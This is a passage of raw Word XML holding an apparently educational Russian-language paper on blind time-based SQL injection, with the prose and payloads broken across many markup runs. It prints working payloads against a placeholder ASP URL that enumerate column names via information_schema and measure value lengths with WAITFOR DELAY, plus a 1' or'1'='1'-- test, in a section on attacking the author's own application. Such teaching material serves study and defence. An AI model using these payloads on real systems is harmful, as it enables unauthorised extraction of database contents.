      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)))</w:t>
      </w:r>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;code</w:t>
      </w:r>
      <w:r w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) WAITFOR DE</w:t>
      </w:r>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LAY '00:00:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00354B8E" w:rsidRPr="00673E72" w:rsidRDefault="00354B8E" w:rsidP="00354B8E">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000606E8" w:rsidRPr="00354B8E" w:rsidRDefault="00354B8E" w:rsidP="00BF7C2C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"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rPr>
        <w:t xml:space="preserve">Для определения имёни первой колонки мы выбираем первую колонку из всех колонок указанной таблицы -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из конкретной базы данных - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>data_base_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00753818">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таким же способом, но с добавлением условия</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> исключения уже найденной колонок </w:t>
      </w:r>
      <w:r w:rsidR="00BD26D7" w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:r w:rsidR="00BD26D7" w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidR="00753818">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> определяем имена всех остальных колонок</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.  Пример</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00753818" w:rsidRPr="00BD26D7" w:rsidRDefault="00753818" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00753818" w:rsidRPr="00BD26D7"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BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://[site]/page.asp?id=1; IF (</w:t>
      </w:r>
      <w:r w:rsidR="00187B14" w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LEN</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TOP 1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from</w:t>
      </w:r>
      <w:r w:rsidR="00354B8E" w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>data_base_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00BD26D7" w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BD26D7" w:rsidRPr="00354B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>!=</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>')&gt;k</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) WAITFOR D</w:t>
      </w:r>
      <w:r w:rsidR="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ELAY '00:00:10'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000606E8" w:rsidRPr="00BD26D7"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EE02CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Далее необходимо определить </w:t>
      </w:r>
      <w:r w:rsidR="00EE02CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>сами записи в этих найденных колонках. Также</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определяем</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длину</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первой</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записи</w:t>
      </w:r>
      <w:r w:rsidR="00EE02CA" w:rsidRPr="00EE02CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w: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17464E" w:rsidRPr="00673E72" w:rsidRDefault="00EE02CA" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://[site]/page.asp?id=1; IF (</w:t>
      </w:r>
      <w:r w:rsidR="00187B14" w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LEN</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00FC4D17" w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Select</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TOP 1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)&gt;k</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) WAITFOR D</w:t>
      </w:r>
      <w:r w:rsidR="00BD26D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ELAY '00:00:10'-- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD26D7" w:rsidRPr="00673E72" w:rsidRDefault="00BD26D7" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0017464E" w:rsidRPr="00E17E00" w:rsidRDefault="00E17E0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Остальные записи прочитать не вызовет никаких трудностей.</w:t>
      </w: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Pr="00E17E00" w:rsidRDefault="00BB019C"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8F0DAD" w:rsidRDefault="008F0DAD" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008F0DAD" w:rsidRPr="00E17E00" w:rsidRDefault="008F0DAD"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BD26D7" w:rsidRDefault="00BD26D7" w:rsidP="009F0170">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc420429533"/>
    </w:p>
    <w:p w:rsidR="00BD26D7" w:rsidRDefault="00BD26D7" w:rsidP="009F0170">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD26D7" w:rsidRDefault="00BD26D7" w:rsidP="009F0170">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="8"/>
    <w:p w:rsidR="008E2951" w:rsidRDefault="008E2951" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD26D7" w:rsidRPr="009F0170" w:rsidRDefault="00BD26D7" w:rsidP="00BD26D7">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc420854437"/>
      <w:r w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Применение внедрения </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F0170">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-кода на собственном приложении</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="00BD26D7" w:rsidRDefault="00BD26D7" w:rsidP="00165AA1">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E2951" w:rsidRDefault="008E2951" w:rsidP="004E6BC2">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>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Для начала проверяем на подверженность </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E2951">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-ин</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ъ</w:t>
      </w:r>
      <w:r w:rsidRPr="008E2951">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">екциям. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Запрос "</w:t>
      </w:r>
      <w:r w:rsidRPr="008E2951">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1' or'1'='1'--"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> возвращает все записи из текущей таблицы если искать точно по слову</w:t>
      </w:r>
      <w:r w:rsidR="00546FBD" w:rsidRPr="00546FBD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Е</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>сли поиск ведётся по частичному совпадени</w:t>
      </w:r>
      <w:r w:rsidR="004E6BC2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
